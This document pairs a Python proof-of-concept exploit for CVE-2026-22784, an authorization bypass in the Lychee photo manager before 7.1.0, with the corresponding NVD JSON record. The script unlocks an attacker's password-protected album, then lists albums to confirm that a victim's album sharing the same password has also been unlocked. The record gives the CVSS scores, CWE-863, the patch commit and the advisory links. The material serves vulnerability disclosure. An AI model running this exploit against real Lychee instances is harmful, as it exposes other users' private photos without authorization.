CVE-2026-22784

# CVE-2026-22784 PoC - Lychee Authorization Bypass # Description: When unlocking one password-protected album, all albums sharing # the same password are automatically unlocked import requests import json TARGET_URL = "http://target-lychee-instance.com" ATTACKER_TOKEN = "attacker_session_token" ALBUM_ID_VICTIM = "victim_album_id_123" ALBUM_ID_ATTACKER = "attacker_album_id_456" SHARED_PASSWORD = "password123" def unlock_album(album_id, password): """Unlock a password-protected album""" url = f"{TARGET_URL}/api/Album::unlock" headers = { "Authorization": f"Bearer {ATTACKER_TOKEN}", "Content-Type": "application/json" } data = { "albumID": album_id, "password": password } response = requests.post(url, headers=headers, json=data) return response.json() def list_albums(): """List all accessible albums after unlocking""" url = f"{TARGET_URL}/api/Album::get" headers = {"Authorization": f"Bearer {ATTACKER_TOKEN}"} response = requests.get(url, headers=headers) return response.json() # Step 1: Unlock attacker's own album with known password print("[*] Step 1: Unlocking attacker's album with password...") result = unlock_album(ALBUM_ID_ATTACKER, SHARED_PASSWORD) print(f"[+] Result: {result}") # Step 2: The vulnerability automatically unlocks ALL albums with same password # including victim's private album print("[*] Step 2: Checking if victim's album is now accessible...") albums = list_albums() for album in albums: if album['id'] == ALBUM_ID_VICTIM: print(f"[!] VULNERABLE: Victim's album '{album['title']}' is now accessible!") print(f"[!] Attacker can now view private photos in victim's album") break print("[*] Exploitation complete - Authorization bypass successful")

{"cve": {"id": "CVE-2026-22784", "sourceIdentifier": "[email protected]", "published": "2026-01-12T19:16:04.127", "lastModified": "2026-01-16T18:39:42.707", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Lychee is a free, open-source photo-management tool. Prior to 7.1.0, an authorization vulnerability exists in Lychee's album password unlock functionality that allows users to gain possibly unauthorized access to other users' password-protected albums. When a user unlocks a password-protected public album, the system automatically unlocks ALL other public albums that share the same password, resulting in a complete authorization bypass. This vulnerability is fixed in 7.1.0."}, {"lang": "es", "value": "Lychee es una herramienta de gestión de fotos gratuita y de código abierto. Anterior a la versión 7.1.0, existe una vulnerabilidad de autorización en la funcionalidad de desbloqueo de álbumes con contraseña de Lychee que permite a los usuarios obtener acceso posiblemente no autorizado a los álbumes protegidos con contraseña de otros usuarios. Cuando un usuario desbloquea un álbum público protegido con contraseña, el sistema desbloquea automáticamente TODOS los demás álbumes públicos que comparten la misma contraseña, lo que resulta en una omisión completa de la autorización. Esta vulnerabilidad se corrigió en la versión 7.1.0."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.3, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:lycheeorg:lychee:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.1.0", "matchCriteriaId": "521F7223-F9F1-48E5-8ECF-A5DC4188BDEC"}]}]}], "references": [{"url": "https://github.com/LycheeOrg/Lychee/commit/f021a29f9ab2bafa81d9f5e32ff5bc89915c7d41", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/LycheeOrg/Lychee/security/advisories/GHSA-jj56-2c54-4f25", "source": "[email protected]", "tags": ["Third Party Advisory", "Exploit"]}]}}